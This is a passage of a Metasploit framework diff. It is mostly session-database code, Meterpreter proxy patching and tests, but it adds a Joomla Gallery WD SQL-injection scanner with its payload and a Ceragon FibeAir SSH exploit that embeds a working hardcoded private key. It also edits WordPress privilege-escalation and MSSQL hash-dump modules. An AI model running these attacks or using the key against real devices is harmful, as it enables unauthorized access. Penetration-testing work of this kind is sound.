desc: truncate_session_desc(opts[:desc]),
platform: opts[:platform],
via_payload: opts[:via_payload],
via_exploit: opts[:via_exploit],
routes: opts[:routes] || [],
datastore: opts[:datastore],
opened_at: opts[:opened_at],
closed_at: opts[:closed_at],
last_seen: opts[:last_seen] || opts[:closed_at],
close_reason: opts[:close_reason],
}
s = ::Mdm::Session.create!(sess_data)
s
}
end
# Truncate the session data if necessary
#
# @param desc [String]
# @return [String] +desc+ truncated to the max length of the desc column
def truncate_session_desc(desc)
# Truncate the session data if necessary
if desc
desc = desc[0, ::Mdm::Session.columns_hash['desc'].limit]
end
desc
end
end

22
lib/msf/core/handler/reverse_http/stageless.rb
View File

@ -53,17 +53,17 @@ module Handler::ReverseHttp::Stageless
datastore['HandlerSSLCert'])
Rex::Payloads::Meterpreter::Patch.patch_passive_service!(dll,
:url => url,
:ssl => true,
:ssl_cert_hash => verify_cert_hash,
:expiration => datastore['SessionExpirationTimeout'].to_i,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:ua => datastore['MeterpreterUserAgent'],
:proxyhost => datastore['PROXYHOST'],
:proxyport => datastore['PROXYPORT'],
:proxy_type => datastore['PROXY_TYPE'],
:proxy_username => datastore['PROXY_USERNAME'],
:proxy_password => datastore['PROXY_PASSWORD'])
:url => url,
:ssl => true,
:ssl_cert_hash => verify_cert_hash,
:expiration => datastore['SessionExpirationTimeout'].to_i,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:ua => datastore['MeterpreterUserAgent'],
:proxy_host => datastore['PayloadProxyHost'],
:proxy_port => datastore['PayloadProxyPort'],
:proxy_type => datastore['PayloadProxyType'],
:proxy_user => datastore['PayloadProxyUser'],
:proxy_pass => datastore['PayloadProxyPass'])
end
end

22
lib/msf/core/module.rb
View File

@ -57,6 +57,10 @@ class Module
# datastore, consumed by #replicant to allow clean override of MSF module methods.
REPLICANT_EXTENSION_DS_KEY = 'ReplicantExtensions'
# The set of keys in {#user_data} that make {#user_data_is_match?} return
# true
MATCH_KEYS = Set.new([ :match, :match_set, :run ])
# Make include public so we can runtime extend
public_class_method :include
@ -278,6 +282,14 @@ class Module
raise RuntimeError, "#{reason.to_s}: #{msg}"
end
# Whether {#user_data} contains everything necessary to make a
# `MetasploitDataModels::AutomaticExploitation::MatchResult`
#
# @return [bool]
def user_data_is_match?
user_data.kind_of?(Hash) && Set.new(user_data.keys).superset?(MATCH_KEYS)
end
##
#
# Just some handy quick checks
@ -295,6 +307,7 @@ class Module
# The array of zero or more platforms.
#
attr_reader :platform
#
# The reference count for the module.
#
@ -315,6 +328,15 @@ class Module
#
attr_accessor :error
# An opaque bag of data to attach to a module. This is useful for attaching
# some piece of identifying info on to a module before calling
# {Msf::Simple::Exploit#exploit_simple} or
# {Msf::Simple::Auxiliary#run_simple} for correlating where modules came
# from.
#
# @see #user_data_is_match?
attr_accessor :user_data
protected
#

4
lib/msf/ui/banner.rb
View File

@ -28,7 +28,7 @@ module Banner
fdata = "<< Missing banner: #{pathname} >>"
begin
raise ArgumentError unless File.readable?(pathname)
raise ArgumentError unless File.stat(pathname).size < 4096
raise ArgumentError unless File.stat(pathname).size < 16384
fdata = File.open(pathname) {|f| f.read f.stat.size}
rescue SystemCallError, ArgumentError
nil
@ -47,6 +47,8 @@ module Banner
# Easter egg (always a halloween themed logo): export/set THISISHALLOWEEN=1
elsif ( ENV['THISISHALLOWEEN'] || Time.now.strftime("%m%d") == "1031" )
logos.concat(Dir.glob(::Msf::Config.logos_directory + File::SEPARATOR + '*.hwtxt'))
elsif ( ENV['APRILFOOLSPONIES'] || Time.now.strftime("%m%d") == "0401" )
logos.concat(Dir.glob(::Msf::Config.logos_directory + File::SEPARATOR + '*.aftxt'))
else
logos.concat(Dir.glob(::Msf::Config.logos_directory + File::SEPARATOR + '*.txt'))
logos.concat(Dir.glob(::Msf::Config.user_logos_directory + File::SEPARATOR + '*.txt'))

20
lib/rex/payloads/meterpreter/patch.rb
View File

@ -63,7 +63,7 @@ module Rex
if proxyport == "80"
proxyinfo = proxyhost
end
if proxy_type.to_s == 'HTTP'
if proxy_type.to_s.upcase == 'HTTP'
proxyinfo = 'http://' + proxyinfo
else #socks
proxyinfo = 'socks=' + proxyinfo
@ -76,17 +76,21 @@ module Rex
# Proxy authentification
def self.patch_proxy_auth!(blob, proxy_username, proxy_password, proxy_type)
unless (proxy_username.nil? or proxy_username.empty?) or
(proxy_password.nil? or proxy_password.empty?) or
proxy_type == 'SOCKS'
return if proxy_type.nil? || proxy_type.upcase == 'SOCKS'
patch_string!(blob, "METERPRETER_USERNAME_PROXY#{"\x00" * 10}",
if proxy_username && !proxy_username.empty?
unless patch_string!(blob, "METERPRETER_USERNAME_PROXY#{"\x00" * 10}",
proxy_username + "\x00")
patch_string!(blob, "METERPRETER_PASSWORD_PROXY#{"\x00" * 10}",
proxy_password + "\x00")
raise ArgumentError, "Unable to patch Proxy Username"
end
end
if proxy_password && !proxy_password.empty?
unless patch_string!(blob, "METERPRETER_PASSWORD_PROXY#{"\x00" * 10}",
proxy_password + "\x00")
raise ArgumentError, "Unable to patch Proxy Password"
end
end
end
# Patch the ssl cert hash

2
metasploit-framework-db.gemspec
View File

@ -31,7 +31,7 @@ Gem::Specification.new do |spec|
# Metasploit::Credential database models
spec.add_runtime_dependency 'metasploit-credential', '~> 0.14.3'
# Database models shared between framework and Pro.
spec.add_runtime_dependency 'metasploit_data_models', '~> 0.23.0'
spec.add_runtime_dependency 'metasploit_data_models', '~> 0.23.2'
# depend on metasploit-framewrok as the optional gems are useless with the actual code
spec.add_runtime_dependency 'metasploit-framework', "= #{spec.version}"
# Needed for module caching in Mdm::ModuleDetails

15
modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb
View File

@ -13,15 +13,16 @@ class Metasploit3 < Msf::Auxiliary
info,
'Name' => 'WordPress WPLMS Theme Privilege Escalation',
'Description' => %q{
The WordPress WPLMS theme from version 1.5.2 to 1.8.4.1 allows authenticated users of
any user level to set any system option via a lack of validation in the import_data function
of /includes/func.php.
The WordPress WPLMS theme from version 1.5.2 to 1.8.4.1 allows an
authenticated user of any user level to set any system option due to a lack of
validation in the import_data function of /includes/func.php.
The module first changes the admin e-mail address to prevent any
notifications being sent to the actual administrator during the attack, re-enables user
registration in case it has been disabled and sets the default role to be administrator.
This will allow for the user to create a new account with admin privileges via the default
registration page found at /wp-login.php?action=register.
notifications being sent to the actual administrator during the attack,
re-enables user registration in case it has been disabled and sets the default
role to be administrator. This will allow for the user to create a new account
with admin privileges via the default registration page found at
/wp-login.php?action=register.
},
'Author' =>
[

4
modules/auxiliary/gather/ms14_052_xmldom.rb
View File

@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => "MS14-052 Microsoft Internet Explorer XMLDOM Filename Disclosure",
'Description' => %q{
This module will use the Microsoft XMLDOM object to enumerate a remote user's filenames.
This module will use the Microsoft XMLDOM object to enumerate a remote machine's filenames.
It will try to do so against Internet Explorer 8 and Internet Explorer 9. To use it, you
must supply your own list of file paths. Each file's format should look like this:
must supply your own list of file paths. Each file path should look like this:
c:\\\\windows\\\\system32\\\\calc.exe
},
'License' => MSF_LICENSE,

107
modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb Normal file
View File

@ -0,0 +1,107 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'uri'
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Gallery WD for Joomla! Unauthenticated SQL Injection Scanner',
'Description' => %q{
This module will scan for Joomla! instances vulnerable to an unauthenticated SQL injection
within the Gallery WD for Joomla! extension version 1.2.5 and likely prior.
},
'Author' =>
[
'CrashBandicoot', #independent discovery/0day drop
'bperry' #discovery/metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '36563']
],
'DisclosureDate' => 'Mar 30 2015'))
register_options([
OptString.new('TARGETURI', [true, 'Target URI of the Joomla! instance', '/'])
], self.class)
end
def run_host(ip)
right_marker = Rex::Text.rand_text_alpha(5)
left_marker = Rex::Text.rand_text_alpha(5)
flag = Rex::Text.rand_text_alpha(5)
vprint_status("#{peer} - Checking host")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'vars_get' => {
'option' => 'com_gallery_wd',
'view' => 'gallerybox',
'image_id' => '-1',
'gallery_id' => '-1',
'thumb_width' => '180',
'thumb_height' => '90',
'open_with_fullscreen' => 0,
'image_width' => 800,
'image_height' => 500,
'image_effect' => 'fade',
'sort_by' => 'order',
'order_by' => 'asc',
'enable_image_filmstrip' => '',
'image_filmstrip_height' => 0,
'enable_image_ctrl_btn' => 1,
'enable_image_fullscreen' => 1,
'popup_enable_info' => 1,
'popup_info_always_show' => 0,
'popup_hit_counter' => 0,
'popup_enable_rate' => 0,
'slideshow_interval' => 5,
'enable_comment_social' => '',
'enable_image_facebook' => '',
'enable_image_twitter' => '',
'enable_image_google' => '',
'enable_image_pinterest' => '',
'enable_image_tumblr' => '',
'watermark_type' => 'none'
},
'vars_post' => {
'image_id' => "1 AND (SELECT 2425 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},0x#{flag.unpack("H*")[0]},0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)",
'rate' => '',
'ajax_task' => 'save_hit_count',
'task' => 'gallerybox.ajax_search'
}
})
unless res && res.body
vprint_error("#{peer} - Server did not respond in an expected way")
return
end
result = res.body =~ /#{left_marker}#{flag}#{right_marker}/
if result
print_good("#{peer} - Vulnerable to unauthenticated SQL injection within Gallery WD for Joomla!")
report_vuln({
:host => rhost,
:port => rport,
:proto => 'tcp',
:name => "Unauthenticated error-based SQL injection in Gallery WD for Joomla!",
:refs => self.references.select { |ref| ref.ctx_val == "36563" }
})
end
end
end

149
modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb Normal file
View File

@ -0,0 +1,149 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'net/ssh'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Auxiliary::Report
Rank = ExcellentRanking
def initialize(info = {})
super(update_info(info, {
'Name' => 'Ceragon FibeAir IP-10 SSH Private Key Exposure',
'Description' => %q{
Ceragon ships a public/private key pair on FibeAir IP-10 devices
that allows passwordless authentication to any other IP-10 device.
Since the key is easily retrievable, an attacker can use it to
gain unauthorized remote access as the "mateidu" user.
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => false,
'Targets' => [ [ "Universal", {} ] ],
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find',
},
},
'Author' => [
'hdm', # Discovery
'todb' # Metasploit module and advisory text (mostly copy-paste)
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-0936'],
['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure
['URL', 'https://hdm.io/blog/2015/01/20/partial-disclosure-is-annoying'] # Related issue with hardcoded user:pass
],
'DisclosureDate' => "Apr 01 2015", # Not a joke
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'DefaultTarget' => 0
}))
register_options(
[
# Since we don't include Tcp, we have to register this manually
Opt::RHOST(),
Opt::RPORT(22)
], self.class
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end
# helper methods that normally come from Tcp
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
def do_login(user)
opt_hash = {
:auth_methods => ['publickey'],
:msframework => framework,
:msfmodule => self,
:port => rport,
:key_data => [ key_data ],
:disable_agent => true,
:config => false,
:record_auth_info => true,
:proxies => datastore['Proxies']
}
opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
begin
ssh_socket = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh_socket = Net::SSH.start(rhost, user, opt_hash)
end
rescue Rex::ConnectionError
return nil
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
return nil
rescue ::Timeout::Error
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
return nil
rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:#{rport} SSH - Failed authentication"
return nil
rescue Net::SSH::Exception => e
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
return nil
end
if ssh_socket
# Create a new session from the socket, then dump it.
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
ssh_socket = nil
return conn
else
return nil
end
end
def exploit
conn = do_login("mateidu")
if conn
print_good "#{rhost}:#{rport} - Successful login"
handler(conn.lsock)
end
end
def key_data
<<EOF
-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgQDBEh0OUdoiplc0P+XW8VPu57etz8O9eHbLHkQW27EZBEdXEYxr
MOFXi+PkA0ZcNDBRgjSJmHpo5WsPLwj/L3/L5gMYK+yeqsNu48ONbbqzZsFdaBQ+
IL3dPdMDovYo7GFVyXuaWMQ4hgAJEc+kk1hUaGKcLENQf0vEyt01eA/k6QIBIwKB
gQCwhZbohVm5R6AvxWRsv2KuiraQSO16B70ResHpA2AW31crCLrlqQiKjoc23mw3
CyTcztDy1I0stH8j0zts+DpSbYZnWKSb5hxhl/w96yNYPUJaTatgcPB46xOBDsgv
4Lf4GGt3gsQFvuTUArIf6MCJiUn4AQA9Q96QyCH/g4mdiwJBAPHdYgTDiQcpUAbY
SanIpq7XFeKXBPgRbAN57fTwzWVDyFHwvVUrpqc+SSwfzhsaNpE3IpLD9RqOyEr6
B8YrC2UCQQDMWrUeNQsf6xQer2AKw2Q06bTAicetJWz5O8CF2mcpVFYc1VJMkiuV
93gCvQORq4dpApJYZxhigY4k/f46BlU1AkAbpEW3Zs3U7sdRPUo/SiGtlOyO7LAc
WcMzmOf+vG8+xesCDOJwIj7uisaIsy1/cLXHdAPzhBwDCQDyoDtnGty7AkEAnaUP
YHIP5Ww0F6vcYBMSybuaEN9Q5KfXuPOUhIPpLoLjWBJGzVrRKou0WeJElPIJX6Ll
7GzJqxN8SGwqhIiK3wJAOQ2Hm068EicG5WQoS+8+KIE/SVHWmFDvet+f1vgDchvT
uPa5zx2eZ2rxP1pXHAdBSgh799hCF60eZZtlWnNqLg==
-----END RSA PRIVATE KEY-----
EOF
end
end

2
modules/post/windows/gather/checkvm.rb
View File

@ -251,7 +251,7 @@ class Metasploit3 < Msf::Post
end
end
if not vm
srvvals = registry_enumkeys('HARDWARE\ACPI\FADT')
srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\FADT')
if srvvals and srvvals.include?("Xen")
vm = true
end

9
modules/post/windows/gather/credentials/mssql_local_hashdump.rb
View File

@ -17,11 +17,14 @@ class Metasploit3 < Msf::Post
super( update_info( info,
'Name' => 'Windows Gather Local SQL Server Hash Dump',
'Description' => %q{ This module extracts the usernames and password
hashes from a MSSQL server and stores them in the loot using the
same technique in mssql_local_auth_bypass (Credits: Scott Sutherland)
hashes from an MSSQL server and stores them as loot. It uses the
same technique in mssql_local_auth_bypass.
},
'License' => MSF_LICENSE,
'Author' => [ 'Mike Manzotti <mike.manzotti[at]dionach.com>'],
'Author' => [
'Mike Manzotti <mike.manzotti[at]dionach.com>',
'nullbind' # Original technique
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'References' =>

156
spec/lib/msf/base/sessions/meterpreter_spec.rb Normal file
View File

@ -0,0 +1,156 @@
require 'spec_helper'
require 'msf/base/sessions/meterpreter'
require 'rex/post/meterpreter/extensions/stdapi/net/interface'
require 'rex/post/meterpreter/extensions/stdapi/net/route'
describe Msf::Sessions::Meterpreter do
before do
allow_any_instance_of(Rex::Post::Meterpreter::PacketDispatcher).to receive(:monitor_socket)
end
subject(:meterpreter) { described_class.new(StringIO.new(""), skip_ssl: true) }
let(:v6_gateway) { "2607:f8b0:4004:0802::1014" }
let(:v4_gateway) { "192.168.3.1" }
let(:v6_linklocal) { "fe80::d6c9:efff:fe53:53ff" }
let(:routes) do
[
Rex::Post::Meterpreter::Extensions::Stdapi::Net::Route.new(
IPAddr.new("0.0.0.0").hton, # Subnet
IPAddr.new("0.0.0.0").hton, # Netmask
IPAddr.new("192.168.3.1").hton # Gateway
),
Rex::Post::Meterpreter::Extensions::Stdapi::Net::Route.new(
IPAddr.new("::").hton, # Subnet
IPAddr.new("::").hton, # Netmask
IPAddr.new(v6_gateway).hton # Gateway
)
]
end
describe "#find_internet_connected_address" do
subject(:connected_address) do
m = described_class.new(StringIO.new(""), skip_ssl: true)
m.stub_chain(:net, :config, :get_interfaces).and_return(interfaces)
m.stub_chain(:net, :config, :get_routes).and_return(routes)
m.session_host = session_host
m.send(:find_internet_connected_address)
end
let(:interfaces) do
ifaces = []
interface_config.each_with_index { |iface_hash, idx|
ifaces << Rex::Post::Meterpreter::Extensions::Stdapi::Net::Interface.new(
index: idx,
mac_addr: "00:11:22:33:44:%02x"%idx,
mac_name: "eth0",
mtu: 1500,
flags: 0,
addrs: iface_hash[:ips],
netmasks: iface_hash[:masks],
scopes: [ "" ]
)
}
ifaces
end
let(:session_host) { "99.99.99.99" }
context "with an address that matches #session_host" do
let(:interface_config) do
[
{ ips: [ "192.168.10.1" ], masks: [ "255.255.255.0" ], },
{ ips: [ "192.168.11.1" ], masks: [ "255.255.255.0" ], },
{ ips: [ "192.168.12.1" ], masks: [ "255.255.255.0" ], },
{ ips: [ session_host ], masks: [ "255.255.255.0" ], },
{ ips: [ "192.168.14.1" ], masks: [ "255.255.255.0" ], },
{ ips: [ "192.168.16.1" ], masks: [ "255.255.255.0" ], },
]
end
it "returns nil" do
expect(connected_address).to be_nil
end
end
# All the rest of these assume session_host does not match any
# interface's addresses
context "one interface with one IPv4 address" do
let(:interface_config) do
[ { ips: [ "10.2.3.4" ], masks: [ "255.255.255.0" ], } ]
end
it "returns that address" do
expect(connected_address).to eq("10.2.3.4")
end
end
context "one interface with one IPv6 address" do
let(:interface_config) do
[
{ ips: [ v6_linklocal ], masks: [ "ffff:ffff:ffff:ffff::" ], },
]
end
it "returns that address" do
expect(connected_address).to eq(v6_linklocal)
end
end
context "one interface with mixed IP versions" do
context "first is correct" do
let(:interface_config) do
[
{ ips: [ "192.168.3.4" ], masks: [ "255.255.255.0" ], },
{ ips: [ v6_linklocal ], masks: [ "ffff:ffff:ffff:ffff::" ], },
]
end
it "returns first address" do
expect(connected_address).to eq("192.168.3.4")
end
end
context "second address is correct" do
let(:interface_config) do
[
{ ips: [ v6_linklocal ], masks: [ "ffff:ffff:ffff:ffff::" ], },
{ ips: [ "192.168.3.4" ], masks: [ "255.255.255.0" ], },
]
end
it "returns second address" do
expect(connected_address).to eq("192.168.3.4")
end
end
end
context "one interface with multiple IPv4 addresses" do
context "first address is correct" do
let(:interface_config) do
[ {
ips: ["192.168.3.4", "10.2.3.4"],
masks: [ "255.255.255.0", "255.0.0.0"],
} ]
end
it "returns first address" do
expect(connected_address).to eq("192.168.3.4")
end
end
context "second address is correct" do
let(:interface_config) do
[ {
ips: [ "10.2.3.4", "192.168.3.4" ],
masks: [ "255.0.0.0", "255.255.255.0" ],
} ]
end
it "returns second address" do
expect(connected_address).to eq("192.168.3.4")
end
end
end
end
end

11
spec/lib/msf/core/module_spec.rb
View File

@ -46,6 +46,17 @@ describe Msf::Module do
it { is_expected.to respond_to :is_usable }
end
describe '#user_data_is_match?' do
subject(:msf_module) {
msf_module = described_class.new
msf_module.user_data = { match: 'match', match_set: 'match_set', run: 'run' }
msf_module
}
specify do
expect(msf_module.user_data_is_match?).to eq(true)
end
end
describe "cloning modules into replicants" do
module MsfExtensionTestFoo; def my_test1; true; end; end;
module MsfExtensionTestBar; def my_test2; true; end; end;

52
spec/support/shared/examples/msf/db_manager/exploit_attempt.rb
View File

@ -3,4 +3,54 @@ shared_examples_for 'Msf::DBManager::ExploitAttempt' do
it { is_expected.to respond_to :report_exploit_attempt }
it { is_expected.to respond_to :report_exploit_failure }
it { is_expected.to respond_to :report_exploit_success }
end
describe '#report_exploit_success' do
subject(:report_exploit_success) do
db_manager.report_exploit_success(opts)
end
let(:workspace) do
FactoryGirl.create(:mdm_workspace)
end
let(:host) do
FactoryGirl.create(:mdm_host, workspace: workspace)
end
let(:refs) do
[ FactoryGirl.create(:mdm_ref) ]
end
let(:vuln) do
FactoryGirl.create(:mdm_vuln)
end
let(:opts) do
{
workspace: workspace,
refs: refs,
host: host,
vuln: vuln,
}
end
context 'with a vuln' do
specify do
expect {
report_exploit_success
}.to change(Mdm::VulnAttempt,:count).by(1)
end
end
context 'without a vuln' do
let(:vuln) { nil }
specify do
expect {
report_exploit_success
}.not_to change(Mdm::VulnAttempt, :count)
end
end
end
end

596
spec/support/shared/examples/msf/db_manager/session.rb
View File

@ -39,12 +39,15 @@ shared_examples_for 'Msf::DBManager::Session' do
let(:module_instance) do
name = 'multi/handler'
double(
'Msf::Module',
:fullname => "exploit/#{name}",
:framework => framework,
:name => name
d = double(
'Msf::Exploit',
user_data: user_data,
fullname: "exploit/#{name}",
framework: framework,
name: name
)
allow(d).to receive(:user_data_is_match?).and_return(false)
d
end
let(:options_workspace) do
@ -65,6 +68,7 @@ shared_examples_for 'Msf::DBManager::Session' do
let(:session) do
session_class.new.tap do |session|
session.exploit = module_instance
session.exploit_datastore = exploit_datastore
session.info = 'Info'
session.platform = 'Platform'
@ -81,6 +85,7 @@ shared_examples_for 'Msf::DBManager::Session' do
Class.new do
include Msf::Session
attr_accessor :exploit
attr_accessor :datastore
attr_accessor :platform
attr_accessor :type
@ -117,153 +122,344 @@ shared_examples_for 'Msf::DBManager::Session' do
)
end
context 'with :workspace' do
before(:each) do
options[:workspace] = options_workspace
context 'with a match in user_data' do
let(:user_data) do
{
match: FactoryGirl.build(:automatic_exploitation_match),
match_set: FactoryGirl.build(:automatic_exploitation_match_set),
run: FactoryGirl.build(:automatic_exploitation_run, workspace: session_workspace),
}
end
it 'should not find workspace from session' do
db_manager.should_not_receive(:find_workspace)
report_session
end
end
context 'without :workspace' do
it 'should find workspace from session' do
db_manager.should_receive(:find_workspace).with(session.workspace).and_call_original
report_session
before do
allow(module_instance).to receive(:user_data_is_match?).and_return(true)
end
it 'should pass session.workspace to #find_or_create_host' do
db_manager.should_receive(:find_or_create_host).with(
hash_including(
:workspace => session_workspace
)
).and_return(host)
report_session
end
end
context 'with workspace from either :workspace or session' do
it 'should pass normalized host from session as :host to #find_or_create_host' do
normalized_host = double('Normalized Host')
db_manager.stub(:normalize_host).with(session).and_return(normalized_host)
# stub report_vuln so its use of find_or_create_host and normalize_host doesn't interfere.
db_manager.stub(:report_vuln)
db_manager.should_receive(:find_or_create_host).with(
hash_including(
:host => normalized_host
)
).and_return(host)
report_session
end
context 'with session responds to arch' do
let(:arch) do
FactoryGirl.generate :mdm_host_arch
end
before(:each) do
session.stub(:arch => arch)
end
it 'should pass :arch to #find_or_create_host' do
db_manager.should_receive(:find_or_create_host).with(
hash_including(
:arch => arch
)
).and_call_original
report_session
end
end
context 'without session responds to arch' do
it 'should not pass :arch to #find_or_create_host' do
db_manager.should_receive(:find_or_create_host).with(
hash_excluding(
:arch
)
).and_call_original
report_session
end
end
it 'should create an Mdm::Session' do
it 'should make a MatchResult' do
expect {
report_session
}.to change(Mdm::Session, :count).by(1)
}.to change(MetasploitDataModels::AutomaticExploitation::MatchResult, :count).by(1)
end
it { should be_an Mdm::Session }
it 'should set session.db_record to created Mdm::Session' do
mdm_session = report_session
session.db_record.should == mdm_session
it 'should not increase the host count' do
expect { report_session }.not_to change(Mdm::Host, :count)
end
context 'with session.via_exploit' do
it 'should create session.via_exploit module' do
framework.modules.should_receive(:create).with(session.via_exploit).and_call_original
it 'should not increase the vuln count' do
expect { report_session }.not_to change(Mdm::Vuln, :count)
end
end
context 'without user_data' do
let(:user_data) { nil }
context 'with :workspace' do
before(:each) do
options[:workspace] = options_workspace
end
it 'should not find workspace from session' do
db_manager.should_not_receive(:find_workspace)
expect { report_session }.to change(Mdm::Vuln, :count).by(1)
end
end
context 'without :workspace' do
it 'should find workspace from session' do
db_manager.should_receive(:find_workspace).with(session.workspace).and_call_original
report_session
end
it 'should create Mdm::Vuln' do
expect {
report_session
}.to change(Mdm::Vuln, :count).by(1)
it 'should pass session.workspace to #find_or_create_host' do
db_manager.should_receive(:find_or_create_host).with(
hash_including(
:workspace => session_workspace
)
).and_return(host)
expect { report_session }.to change(Mdm::Vuln, :count).by(1)
end
end
context 'with workspace from either :workspace or session' do
it 'should pass normalized host from session as :host to #find_or_create_host' do
normalized_host = double('Normalized Host')
db_manager.stub(:normalize_host).with(session).and_return(normalized_host)
# stub report_vuln so its use of find_or_create_host and normalize_host doesn't interfere.
db_manager.stub(:report_vuln)
db_manager.should_receive(:find_or_create_host).with(
hash_including(
:host => normalized_host
)
).and_return(host)
report_session
end
context 'created Mdm::Vuln' do
let(:mdm_session) do
Mdm::Session.last
end
let(:rport) do
nil
context 'with session responds to arch' do
let(:arch) do
FactoryGirl.generate :mdm_host_arch
end
before(:each) do
Timecop.freeze
session.stub(:arch => arch)
end
session.exploit_datastore['RPORT'] = rport
it 'should pass :arch to #find_or_create_host' do
db_manager.should_receive(:find_or_create_host).with(
hash_including(
:arch => arch
)
).and_call_original
expect { report_session }.to change(Mdm::Vuln, :count).by(1)
end
end
context 'without session responds to arch' do
it 'should not pass :arch to #find_or_create_host' do
db_manager.should_receive(:find_or_create_host).with(
hash_excluding(
:arch
)
).and_call_original
expect { report_session }.to change(Mdm::Vuln, :count).by(1)
end
end
it 'should create an Mdm::Session' do
expect {
report_session
}.to change(Mdm::Session, :count).by(1)
end
it { should be_an Mdm::Session }
it 'should set session.db_record to created Mdm::Session' do
mdm_session = report_session
session.db_record.should == mdm_session
end
context 'with session.via_exploit' do
it 'should create Mdm::Vuln' do
expect {
report_session
}.to change(Mdm::Vuln, :count).by(1)
end
context 'created Mdm::Vuln' do
let(:mdm_session) do
Mdm::Session.last
end
let(:rport) do
nil
end
before(:each) do
Timecop.freeze
session.exploit_datastore['RPORT'] = rport
report_session
end
after(:each) do
Timecop.return
end
subject(:vuln) do
Mdm::Vuln.last
end
it { expect(subject.host).to eq(Mdm::Host.last) }
it { expect(subject.refs).to eq([]) }
it { expect(subject.exploited_at).to be_within(1.second).of(Time.now.utc) }
context "with session.via_exploit 'exploit/multi/handler'" do
context "with session.exploit_datastore['ParentModule']" do
it { expect(subject.info).to eq("Exploited by #{parent_module_fullname} to create Session #{mdm_session.id}") }
it { expect(subject.name).to eq(parent_module_name) }
end
end
context "without session.via_exploit 'exploit/multi/handler'" do
let(:reference_name) do
'windows/smb/ms08_067_netapi'
end
before(:each) do
path = File.join(
parent_path,
'exploits',
"#{reference_name}.rb"
)
type = 'exploit'
# fake cache data for ParentModule so it can be loaded
framework.modules.send(
:module_info_by_path=,
{
path =>
{
:parent_path => parent_path,
:reference_name => reference_name,
:type => type,
}
}
)
session.via_exploit = "#{type}/#{reference_name}"
end
it { expect(subject.info).to eq("Exploited by #{session.via_exploit} to create Session #{mdm_session.id}") }
it { expect(subject.name).to eq(reference_name) }
end
context 'with RPORT' do
let(:rport) do
# use service.port instead of having service use rport so
# that service is forced to exist before call to
# report_service, which happens right after using rport in
# outer context's before(:each)
service.port
end
let(:service) do
FactoryGirl.create(
:mdm_service,
:host => host
)
end
it { expect(subject.service).to eq(service) }
end
context 'without RPORT' do
it { expect(subject.service).to be_nil }
end
end
context 'created Mdm::ExploitAttempt' do
let(:rport) do
nil
end
before(:each) do
Timecop.freeze
session.exploit_datastore['RPORT'] = rport
report_session
end
after(:each) do
Timecop.return
end
subject(:exploit_attempt) do
Mdm::ExploitAttempt.last
end
it { expect(subject.attempted_at).to be_within(1.second).of(Time.now.utc) }
# @todo https://www.pivotaltracker.com/story/show/48362615
it { expect(subject.session_id).to eq(Mdm::Session.last.id) }
it { expect(subject.exploited).to be_truthy }
# @todo https://www.pivotaltracker.com/story/show/48362615
it { expect(subject.vuln_id).to eq(Mdm::Vuln.last.id) }
context "with session.via_exploit 'exploit/multi/handler'" do
context "with session.datastore['ParentModule']" do
it { expect(subject.module).to eq(parent_module_fullname) }
end
end
context "without session.via_exploit 'exploit/multi/handler'" do
before(:each) do
session.via_exploit = parent_module_fullname
end
it { expect(subject.module).to eq(session.via_exploit) }
end
end
end
context 'returned Mdm::Session' do
before(:each) do
Timecop.freeze
end
after(:each) do
Timecop.return
end
subject(:vuln) do
Mdm::Vuln.last
subject(:mdm_session) do
report_session
end
it { expect(subject.host).to eq(Mdm::Host.last) }
it { expect(subject.refs).to eq([]) }
it { expect(subject.exploited_at).to be_within(1.second).of(Time.now.utc) }
#
# Ensure session has attributes present so its on mdm_session are
# not just comparing nils.
#
it 'should have session.info present' do
session.info.should be_present
end
it 'should have session.sid present' do
session.sid.should be_present
end
it 'should have session.platform present' do
session.platform.should be_present
end
it 'should have session.type present' do
session.type.should be_present
end
it 'should have session.via_exploit present' do
session.via_exploit.should be_present
end
it 'should have session.via_payload present' do
session.via_exploit.should be_present
end
it { expect(subject.datastore).to eq(session.exploit_datastore.to_h) }
it { expect(subject.desc).to eq(session.info) }
it { expect(subject.host_id).to eq(Mdm::Host.last.id) }
